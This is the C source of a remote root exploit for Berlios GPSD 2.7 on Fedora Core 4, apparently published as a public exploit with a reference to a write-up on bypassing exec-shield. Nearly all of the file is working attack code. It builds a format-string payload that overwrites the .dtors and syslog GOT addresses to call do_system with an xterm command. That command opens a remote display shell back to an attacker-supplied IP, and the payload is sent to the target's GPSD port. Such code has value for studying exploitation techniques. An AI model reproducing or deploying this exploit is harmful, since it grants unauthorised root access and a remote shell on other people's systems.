/* ** FC4 (exec-shield) based Berlios GPSD 2.7 remote root exploit ** by Xpl017Elz ** ** Bug Found By: KF ** ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** ** Reference: http://www.securityfocus.com/bid/12371 (2005/01/26) ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), . ** My World: http://x82.inetcop.org */ #include #include #include #include #include #include #define HOST "x0x" #define PORT 2947 #define DF_SFLAG 14 #define DF_OFFSET 17 #define DTORS_AUX 0x08048ec8 #define DTOR_END_ADDR 0x0804c110 #define SYSLOG_RETLOC 0x0804c250 #define DO_SYSTEM 0x00749f3c #define XHOST_IP "82.82.82.82" void banrl(); void usage(); void re_connt(int sock); int setsock(char *host,int port); void conn_shell(int sock); long xterm_shell[]={ // do_system("xterm -di ip_addr"); 0x7478,0x7265, 0x206d,0x642d, 0x2069,0x4141, /* IP address */ 0x4141,0x4141, 0x4141,0x4141, 0x303a,0x0000 }; int xterm_ip_count=5; int get_10_ip(char *ipbuf){ char tbuf[32]; int i=0; unsigned long ip,ip1,ip2,ip3,ip4; ip=ip1=ip2=ip3=ip4; sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); #define IP1 16777216 #define IP2 65536 #define IP3 256 ip=0; ip+=ip1 * (IP1); ip+=ip2 * (IP2); ip+=ip3 * (IP3); ip+=ip4; memset((char *)ipbuf,0,256); sprintf(ipbuf,"%lu",ip); xterm_ip_count=5; for(i=0;i<10;i+=2){ memset((char *)tbuf,0,sizeof(tbuf)); snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]); ip=strtoul(tbuf,NULL,0); xterm_shell[xterm_ip_count++]=ip; } return 0; } int main(int argc,char *argv[]){ int sock,i=0; int sflag=DF_SFLAG; unsigned long do_system_addr=DO_SYSTEM; unsigned long dtors_aux_addr=DTORS_AUX; unsigned long syslog_retloc=SYSLOG_RETLOC; unsigned long retloc=DTOR_END_ADDR; int do_system_head=0; int do_system_tail=0; int dtors_aux_head=0; int dtors_aux_tail=0; char do_ex[1024]; char xhost_ip_buf[256]=XHOST_IP; char host[256]=HOST; int port=PORT; extern char *optarg; get_10_ip(xhost_ip_buf); memset((char *)do_ex,0,sizeof(do_ex)); (void)banrl(); while((i=getopt(argc,argv,"R:r:D:d:S:s:G:g:I:i:H:h:P:p:"))!=EOF){ switch(i){ case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'D': case 'd': do_system_addr=strtoul(optarg,NULL,0); break; case 'S': case 's': syslog_retloc=strtoul(optarg,NULL,0); break; case 'G': case 'g': dtors_aux_addr=strtoul(optarg,NULL,0); break; case 'I': case 'i': memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); get_10_ip(xhost_ip_buf); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'P': case 'p': port=atoi(optarg); break; case '?': default: (void)usage(argv[0]); break; } } if(!strcmp(host,HOST)){ (void)usage(argv[0]); } fprintf(stdout," [+] make exploit code.\n"); fprintf(stdout," [+] .dtors address: %p\n",retloc); fprintf(stdout," [+] do_system address: %p\n",do_system_addr); fprintf(stdout," [+] syslog GOT address: %p\n",syslog_retloc); fprintf(stdout," [+] __do_global_dtors_aux: %p\n",dtors_aux_addr); do_system_head=(do_system_addr>>16)&0xffff; do_system_tail=(do_system_addr>>0)&0xffff; dtors_aux_head=(dtors_aux_addr>>16)&0xffff; dtors_aux_tail=(dtors_aux_addr>>0)&0xffff; i=0; do_ex[i++]='_'; do_ex[i++]='_'; do_ex[i++]='_'; *(long *)&do_ex[i]=retloc; i+=4; *(long *)&do_ex[i]=retloc+2; i+=4; *(long *)&do_ex[i]=retloc+4; i+=4; *(long *)&do_ex[i]=retloc+6; i+=4; *(long *)&do_ex[i]=retloc+8; i+=4; *(long *)&do_ex[i]=retloc+10; i+=4; *(long *)&do_ex[i]=retloc+12; i+=4; *(long *)&do_ex[i]=retloc+14; i+=4; *(long *)&do_ex[i]=retloc+16; i+=4; *(long *)&do_ex[i]=retloc+18; i+=4; *(long *)&do_ex[i]=retloc+20; i+=4; *(long *)&do_ex[i]=retloc+22; i+=4; *(long *)&do_ex[i]=retloc+24; i+=4; *(long *)&do_ex[i]=retloc+26; i+=4; *(long *)&do_ex[i]=syslog_retloc; i+=4; *(long *)&do_ex[i]=syslog_retloc+2; i+=4; sprintf(do_ex+i, "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n" "%%%ux%%%d$n%%%ux%%%d$n", do_system_tail-(i+DF_OFFSET),sflag+0, (0x10000+do_system_head)-do_system_tail,sflag+1, (0x10000+xterm_shell[0])-do_system_head,sflag+2, (0x10000+xterm_shell[1])-xterm_shell[0],sflag+3, (0x10000+xterm_shell[2])-xterm_shell[1],sflag+4, (0x10000+xterm_shell[3])-xterm_shell[2],sflag+5, (0x10000+xterm_shell[4])-xterm_shell[3],sflag+6, (0x10000+xterm_shell[5])-xterm_shell[4],sflag+7, (0x10000+xterm_shell[6])-xterm_shell[5],sflag+8, (0x10000+xterm_shell[7])-xterm_shell[6],sflag+9, (0x10000+xterm_shell[8])-xterm_shell[7],sflag+10, (0x10000+xterm_shell[9])-xterm_shell[8],sflag+11, (0x10000+xterm_shell[10])-xterm_shell[9],sflag+12, (0x10000+xterm_shell[11])-xterm_shell[10],sflag+13, (0x10000+dtors_aux_tail)-xterm_shell[11],sflag+14, (0x10000+dtors_aux_head)-dtors_aux_tail,sflag+15); fprintf(stdout," [+] make socket.\n"); fprintf(stdout," [+] host: %s.\n",host); fprintf(stdout," [+] port: %d.\n",port); sock=setsock(host,port); re_connt(sock); fprintf(stdout," [*] send exploit code.\n"); send(sock,do_ex,strlen(do_ex),0); close(sock); fprintf(stdout," [*] syslog reconnect.\n"); sock=setsock(host,port); re_connt(sock); close(sock); fprintf(stdout," [*] exploit end.\n\n"); exit(-1); } void banrl(){ fprintf(stdout,"\n FC4 (exec-shield) based Berlios GPSD 2.7 remote root exploit\n"); fprintf(stdout," by Xpl017Elz\n\n"); } void usage(char *arg0){ fprintf(stdout," Usage: %s -options arguments\n\n",arg0); fprintf(stdout,"\t-r [retloc] - .dtors address.\n"); fprintf(stdout,"\t-d [do_system] - do_system address.\n"); fprintf(stdout,"\t-s [syslog] - syslog GOT address.\n"); fprintf(stdout,"\t-g [dtors_aux] - __do_global_dtors_aux address.\n"); fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n"); fprintf(stdout,"\t-h [host] - target hostname.\n"); fprintf(stdout,"\t-p [port] - target port number.\n"); fprintf(stdout,"\t-? - help information.\n\n"); fprintf(stdout," Example: %s -h localhost -p 2947\n\n",arg0); exit(-1); } void re_connt(int sock) { if(sock==-1) { fprintf(stdout," [-] Failed.\n\n"); exit(-1); } } int setsock(char *host,int port) { int sock; struct hostent *he; struct sockaddr_in x82_addr; if((he=gethostbyname(host))==NULL) { return(-1); } if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) { return(-1); } x82_addr.sin_family=AF_INET; x82_addr.sin_port=htons(port); x82_addr.sin_addr=*((struct in_addr *)he->h_addr); bzero(&(x82_addr.sin_zero),8); if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) { return(-1); } return(sock); } /* eoc */